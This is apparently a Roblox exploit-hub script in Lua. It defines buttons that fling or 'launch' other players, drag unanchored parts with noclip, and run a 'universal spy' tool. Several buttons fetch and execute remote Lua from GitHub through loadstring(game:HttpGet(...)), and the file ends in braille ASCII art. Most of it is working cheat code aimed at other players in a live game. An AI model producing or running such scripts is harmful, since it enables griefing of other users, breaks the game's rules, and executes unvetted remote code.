Description = "must be an unanchored part, must be noclip use iy or sum, and hold control and click on the unanchored part made by joshclark756#7155", Callback = function() -- use noclip with it -- made by joshclark756#7155 -- Variables local mouse = game:GetService("Players").LocalPlayer:GetMouse() local uis = game:GetService("UserInputService") -- Connect mouse.Button1Down:Connect(function() -- Check for Target & Left Shift if mouse.Target and uis:IsKeyDown(Enum.KeyCode.LeftControl) then local npc = mouse.target local npcparts = mouse.target.Parent local PlayerCharacter = game:GetService("Players").LocalPlayer.Character local PlayerRootPart = PlayerCharacter.HumanoidRootPart local A0 = Instance.new("Attachment") local AP = Instance.new("AlignPosition") local AO = Instance.new("AlignOrientation") local A1 = Instance.new("Attachment") for _, v in pairs(npcparts:GetDescendants()) do if v:IsA("BasePart") or v:IsA("Part") and v.Name ~= "HumanoidRootPart" then do v.CanCollide = false end end end -- Variables local mouse = game:GetService("Players").LocalPlayer:GetMouse() local uis = game:GetService("UserInputService") -- Connect mouse.Button1Down:Connect(function() if mouse.Target and uis:IsKeyDown(Enum.KeyCode.LeftControl) then local npc = mouse.target local npcparts = mouse.target.Parent local PlayerCharacter = game:GetService("Players").LocalPlayer.Character local PlayerRootPart = PlayerCharacter.HumanoidRootPart local A0 = Instance.new("Attachment") local AP = Instance.new("AlignPosition") local AO = Instance.new("AlignOrientation") local A1 = Instance.new("Attachment") for _, v in pairs(npcparts:GetDescendants()) do if v:IsA("BasePart") or v:IsA("Part") and v.Name ~= "HumanoidRootPart" then do v.CanCollide = false wait(0) local player = game:GetService("Players").LocalPlayer local mouse = player:GetMouse() bind = "e" -- has to be lowercase mouse.KeyDown:connect(function(key) if key == bind then do v.CanCollide = true end end end) end end end for _, v in pairs(PlayerCharacter:GetDescendants()) do if v:IsA("BasePart") then if v.Name == "HumanoidRootPart" or v.Name == "UpperTorso" or v.Name == "Head" then end end end PlayerRootPart.Position = PlayerRootPart.Position+Vector3.new(0, 0, 0) PlayerCharacter.Head.Anchored = false PlayerCharacter.Torso.Anchored = false A0.Parent = npc AP.Parent = npc AO.Parent = npc AP.Responsiveness = 200 AP.MaxForce = math.huge AO.MaxTorque = math.huge AO.Responsiveness = 200 AP.Attachment0 = A0 AP.Attachment1 = A1 AO.Attachment1 = A1 AO.Attachment0 = A0 A1.Parent = PlayerRootPart end end) for _, v in pairs(PlayerCharacter:GetDescendants()) do if v:IsA("BasePart") then if v.Name == "HumanoidRootPart" or v.Name == "UpperTorso" or v.Name == "Head" then end end end PlayerRootPart.Position = PlayerRootPart.Position+Vector3.new(0, 0, 0) PlayerCharacter.Head.Anchored = false PlayerCharacter.Torso.Anchored = false A0.Parent = npc AP.Parent = npc AO.Parent = npc AP.Responsiveness = 200 AP.MaxForce = math.huge AO.MaxTorque = math.huge AO.Responsiveness = 200 AP.Attachment0 = A0 AP.Attachment1 = A1 AO.Attachment1 = A1 AO.Attachment0 = A0 A1.Parent = PlayerRootPart end end) end }) Main:AddButton({ Title = "FE launch player High", Description = "launches desired player high (note) click Launch then quickly press unlaunch then after abt 10 seconds press it again and it should launch them hella high to stop just reset", Callback = function() local Players = game:GetService("Players") local Workspace = game:GetService("Workspace") local UserInputService = game:GetService("UserInputService") local RunService = game:GetService("RunService") local plr = game:service"Players".LocalPlayer; local tween_s = game:service"TweenService"; local info = TweenInfo.new(10000,Enum.EasingStyle.Quad); function tp(...) local tic_k = tick(); local params = {...}; local cframe = CFrame.new(params[1],params[2],params[3]); local tween,err = pcall(function() local tween = tween_s:Create(plr.Character["HumanoidRootPart"],info,{CFrame=cframe}); tween:Play(); end) if not tween then return err end end local LocalPlayer = Players.LocalPlayer local Heartbeat = RunService.Heartbeat local Angles = CFrame.Angles local CFrame_new = CFrame.new local Vector3_new = Vector3.new local function findPlayer(name) for _, player in ipairs(Players:GetPlayers()) do if string.sub(string.lower(player.Name), 0, #name) == string.lower(name) or string.sub(string.lower(player.DisplayName), 0, #name) == string.lower(name) then return player end end return nil end local function layCharacterFlat(targetPlayer) local localCharacter = LocalPlayer.Character if not localCharacter then return end local localHumanoidRootPart = localCharacter:FindFirstChild("HumanoidRootPart") if not localHumanoidRootPart then return end local targetCharacter = targetPlayer.Character if not targetCharacter then return end local targetHumanoidRootPart = targetCharacter:FindFirstChild("HumanoidRootPart") if not targetHumanoidRootPart then return end -- Calculate the position underneath the target player's feet local targetFeetPosition = targetHumanoidRootPart.Position - Vector3_new(0, targetHumanoidRootPart.Size.Y + 1, 0) -- Lay the local character flat localHumanoidRootPart.CFrame = CFrame_new(targetFeetPosition) * Angles(math.pi / 2, 0, 0) end -- Creating a ScreenGui for the GUI local gui = Instance.new("ScreenGui") gui.Name = "CarpetGUI" gui.Parent = game:GetService("CoreGui") -- Creating the main Frame for the GUI local frame = Instance.new("Frame") frame.Size = UDim2.new(0, 200, 0, 150) frame.Position = UDim2.new(0.5, -100, 0.5, -50) frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) frame.BorderSizePixel = 0 frame.Parent = gui local textBox = Instance.new("TextBox") textBox.Size = UDim2.new(1, 0, 0, 20) textBox.Position = UDim2.new(0, 0, 0, 5) textBox.PlaceholderText = "Enter player name" textBox.Parent = frame local button = Instance.new("TextButton") button.Size = UDim2.new(1, 0, 0, 75) button.Position = UDim2.new(0, 0, 0, 30) button.Text = "Launch" button.Parent = frame local carpetEnabled = false local heartbeatConnection button.MouseButton1Click:Connect(function() local targetPlayerName = textBox.Text local targetPlayer = findPlayer(targetPlayerName) if targetPlayer then layCharacterFlat(targetPlayer) end carpetEnabled = not carpetEnabled if carpetEnabled then -- Function to update carpet position and local player's orientation local function updateCarpet() local player = findPlayer(textBox.Text) if player then local humanoid = player.Character and player.Character:FindFirstChildOfClass("Humanoid") if humanoid then local rootPart = player.Character:FindFirstChild("HumanoidRootPart") if rootPart then local carpet = LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") if carpet then carpet.CFrame = rootPart.CFrame * CFrame.new(0, -5, 0) layCharacterFlat(targetPlayer) carpet.Anchored = false tp(LocalPlayer.Character.HumanoidRootPart.Size.X, LocalPlayer.Character.HumanoidRootPart.Size.Y + 20000,LocalPlayer.Character.HumanoidRootPart.Size.Z) end end end end end -- Run update function every frame heartbeatConnection = Heartbeat:Connect(updateCarpet) else -- Disconnect the heartbeat to stop updating carpet position if heartbeatConnection then heartbeatConnection:Disconnect() end end end) local function dragify(frame) local UIS = game:GetService("UserInputService") local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end frame.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) frame.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UIS.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) end dragify(frame) end }) Main:AddButton({ Title = "FE Player lifter", Description = "basically ascends anyone you click on", Callback = function() --Made by rouxhaver --super janky player = game:GetService("Players").LocalPlayer mouse = player:GetMouse() camera = game:GetService("Workspace").CurrentCamera ts = game:GetService("TweenService") function createtween(part, cframe,ttime) local tweeninfo = TweenInfo.new(ttime) tween = ts:Create(part, tweeninfo, {CFrame = cframe}) tween:Play() tween.Completed:Wait() end outline = Instance.new("Highlight") target = nil mouse.Button1Up:Connect(function() if mouse.Target then local model = mouse.Target:FindFirstAncestorOfClass("Model") if model and model:FindFirstChild("Humanoid") then do camera.CameraSubject = model.Humanoid target = model end else outline.Parent = nil end end end) game:GetService("RunService").RenderStepped:Connect(function() if player.Character:FindFirstChild("HumanoidRootPart") then player.Character.HumanoidRootPart.Velocity = Vector3.new(0,0,0) if target and target:FindFirstChild("HumanoidRootPart") then if target.HumanoidRootPart.CFrame.Y + 20 < player.Character.HumanoidRootPart.CFrame.Y then tween:Cancel() end end end if mouse.Target then local model = mouse.Target:FindFirstAncestorOfClass("Model") if model and model:FindFirstChild("Humanoid") then do outline.Parent = model end else outline.Parent = nil end end end) while task.wait() do if target ~= nil and target:FindFirstAncestorOfClass("Workspace") and target ~= player.Character and player.Character:FindFirstChild("HumanoidRootPart") and target:FindFirstChild("HumanoidRootPart") then character = player.Character hrp = character.HumanoidRootPart thrp = target.HumanoidRootPart hrp.CFrame = thrp.CFrame * CFrame.Angles(math.rad(90),0,0) + thrp.CFrame.UpVector * -10 end if target ~= nil and target:FindFirstAncestorOfClass("Workspace") and target ~= player.Character and player.Character:FindFirstChild("HumanoidRootPart") and target:FindFirstChild("HumanoidRootPart") then character = player.Character hrp = character.HumanoidRootPart thrp = target.HumanoidRootPart rot = thrp.CFrame*CFrame.Angles(math.rad(25),math.rad(25),math.rad(25)) createtween(hrp, thrp.CFrame * CFrame.Angles(math.rad(90),0,0) + thrp.CFrame.UpVector * 1000000, 100000) end end end }) Main:AddButton({ Title = "universal spy", Description = "spy", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/MichaelScripter/MiniScript/main/Spy%20gui.lua"))() end }) Main:AddButton({ Title = "FE Sit Animation", Description = "changes the animation of ur sit", Callback = function() loadstring(game:HttpGet(('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/sitanimation.txt'),true))() end }) Main:AddButton({ Title = "FE Sit", Description = "makes u sit", Callback = function() game:GetService("Players").LocalPlayer.Character:FindFirstChildWhichIsA("Humanoid").Sit = true end }) Main:AddButton({ Title = "FE R15 to R6", Description = "read", Callback = function() --R6 animations for R15 Characters without Reanimation! --This is a script that roblox made (Script location: content\avatar\unification\humanoidClassicAnimate.lua) but I edited for it to work with exploits and etc. --Edited by Invisible_#3657 :3 --[[ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡀⠀⠀⠀⠀⠀⠀⠀⢀⣠⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠁⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢶⣿⢃⣠⣴⣶⣶⣿⣛⢯⣹⣾⠁⠀⠀⠀⠀⠀⢀⣀⣤⣴⣶⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣻⣾⣿⣞⣯⣷⣽⣾⣿⣁⣀⣠⢤⡶⣶⠿⣻⣶⣟⡿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣟⣯⣿⣶⣯⣿⣿⣿⡁⠀⣴⠿⣟⣿⣟⣿⣻⢷⢯⣞⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⢈⡇⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡶⢒⣖⣲⡶⢶⡖⣶⣒⢶⡲⣞⣫⠭⣭⣭⣽⣭⣯⣽⣿⣿⣿⣿⣿⣿⣿⠿⢿⡿⠿⠿⠿⣌⠿⢿⣿⣿⣿⣿⡾⣽⢯⣟⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠀⠘⡀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣯⣛⢧⣛⢧⣛⡶⣹⣎⢷⣝⡮⣟⢷⡾⣹⢯⡟⠉⠉⠛⢿⣿⣿⣯⣟⣿⣫⣽⡿⣃⣔⣬⣿⣷⣯⣿⣿⣿⣿⣽⣻⣾⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣟⡾⣭⡟⣾⣹⢗⣾⣫⢾⡽⣽⢾⡽⢯⡟⠀⠀⠀⢀⢈⣿⣿⣿⣿⣿⠿⢻⣷⣼⣿⣿⣟⣿⣟⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠂⠀⠀⠐⠀⠀⠀⠠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣷⣿⣷⣯⣟⡾⣽⣳⢿⡽⣾⡽⡟⠀⠀⢀⣰⠞⠟⠙⢻⣷⣿⣸⣷⣾⣟⣺⣽⣟⣻⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣷⣯⣿⣽⣳⢿⠃⠀⠀⢀⠀⢠⣤⣦⣄⣇⠉⠛⠛⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠻⣿⣿⣿⣿⣿⣉⠉⠉⠻⠀⠀⠠⢀⣾⢿⠋⢁⣿⣿⠀⠀⠀⠀⣿⣧⠙⢿⣹⣏⢠⣛⠟⠁⠀⠀⢀⣴⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⠿⣿⣿⣿⣓⣈⣰⣦⣤⣀⣼⠋⠀⠀⢭⣽⣿⡇⠀⣀⣀⣿⣿⡇⡸⣿⣿⡤⠉⠒⠤⣀⠀⠠⡄⠀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⢹⠏⠀⠛⣞⣧⣾⠍⠢⣀⠀⠈⠻⠟⣇⢉⣡⡶⣭⠯⡀⠐⠛⠙⢇⠀⠐⢲⠏⠀⠀⠈⠲⠞⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡴⠁⢀⠄⠂⢸⠛⠁⣠⣲⡆⢔⠾⠋⠀⠈⠢⣉⠀⢀⣀⣈⡆⠀⠀⢸⣀⠔⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠚⠤⣌⡁⠀⠀⠈⢆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣿⣿⡿⠀⠀⣜⣩⠟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠼⣛⡉⠀⠀⠓⢄⡀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⡹⠋⠀⣠⠞⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠐⠒⠚⣿⣶⠦⣄⣀⡀⠘⠿⠽⠶⢾⣷⣀⠖⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣀⡀⣀⣀⣠⡿⠍⣛⠻⡿⠿⣟⣲⣶⣶⡶⠿⣿⣖⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⣠⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠼⠛⢻⠿⠻⢿⣿⣷⣿⣶⣆⠬⡯⣑⣿⣿⣿⣿⣹⣍⣧⣾⠈⠉⠉⠒⠒⠠⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⢠⠁⢡⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠋⠀⠀⠐⠒⠠⣔⠁⠀⠉⣿⣿⣿⢛⡖⠾⠿⢿⡿⠿⣾⠟⠁⠀⠀⠀⠀⠀⠸⠀⠱⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢠⠃⠀⠀⢢⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⡅⠀⠀⠀⠀⠀⠀⠀⠉⠒⠄⠘⢿⣿⠇⠈⠁⠒⠺⣤⣢⡼⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠣⡀⠀⠀⡼⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠹⡄⠐⠒⠠⠤⠀⣀⠀⠀⠀⠀⠈⣏⠀⠀⠀⠀⠀⠈⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⢆⠀⠀⠙⣆⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠑⣄⠜⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡰⠁⠀⠘⣆⠀⠀⠀⠀⠀⠉⠑⠢⡀⢀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀⠈⢆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡰⠁⠀⠀⠀⠈⢣⡀⠠⢄⣀⠀⠀⠀⢠⠞⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⢄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⠧⣀⣀⠀⢀⡤⠋⠀⠀⠀⠀⠈⢁⠒⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡆⠀⢀⣠⢾⡍⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠆⠈⢂⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠞⣻⡿⠏⠀⠀⠀⠐⠢⠄⢀⡀⣰⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡷⠖⠋⣁⡼⣇⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⡀⢀⡎⠀⠀⠀⢳⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⡔⠍⠀⠀⠈⠢⣀⠀⠀⠀⡰⢠⡇⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣇⡴⠋⠁⠁⢹⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠑⢄⠀⡴⠁⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⢧⠄⠂⡄⠀⠀⠀⠀⠁⠢⢴⣁⡼⠀⠀⠀⠈⠑⠂⠀⠤⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣧⣀⠤⠖⠉⠀⢧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠇⢠⠀⠀⠀⠑⠤⡀⠀⠀⡐⠁⢰⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡏⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠀⠈⢆⠀⠀⠀⠀⠀⢑⠞⠤⣠⣇⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⣀⡠⠤⢤⢤⠴⠃⠀⡀⠔⠊⠀⠠⢹⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢺⠀⠀⠀⠣⡀⠀⠀⡤⠃⠠⣼⠃⢳⠈⠉⠉⣍⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⠀⠀⠀⡜⢸⢀⡔⠉⠀⢀⡠⢔⠊⠉⠻⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⡦⡀⠀⠀⠈⠑⠺⠤⣴⠟⠃⠀⠸⡆⠐⠀⢸⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀⢀⠃⢸⡃⣇⠀⡰⠟⠂⠁⠀⠀⠀⠙⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢄⠀⠀⠀⠈⠺⠦⣄⣠⠤⠴⠊⠉⠀⠀⠀⡼⠁⠀⠐⢸⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⢘⠀⠀⠀⢸⠀⢸⣇⠞⠉⠀⠀⠀⠀⢀⡠⠐⠀⠈⢣⠀⠀⠀⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡜⠈⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⢿⣁⠀⠈⢀⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡈⢀⠀⠀⠰⠀⢸⠹⡄⠀⠀⢀⡠⠒⠁⠀⠀⠀⡠⠀⢳⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢜⠀⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⠋⠀⠈⠉⠓⠦⠄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡯⠀⠀⠀⣆⣼⡆⢙⣤⡐⠁⠀⠀⠀⡠⠔⠉⠀⠀⠀⠹⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢂⡠⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⢾⠁⠉⠢⢄⡀⠀⠀⠀⠀⠈⠉⠁⠐⠒⠒⠒⠒⠒⠚⠓⠀⠈⠉⠀⠀⢧⠀⠘⢷⣀⡠⠔⠉⠀⠀⠀⠀⢀⠠⠀⠱⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠚⡱⠁⠀⠀⠀⠀⠈⠁⠒⠠⠤⢀⣀⣀⢀⠀⡀⢀⢀⡀⠀⠀⣀⡠⠔⠒⠂⠙⣆⠀⠀⠙⣦⠀⠀⠀⢀⠄⠊⠁⠀⠀⡀⠘⣄⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 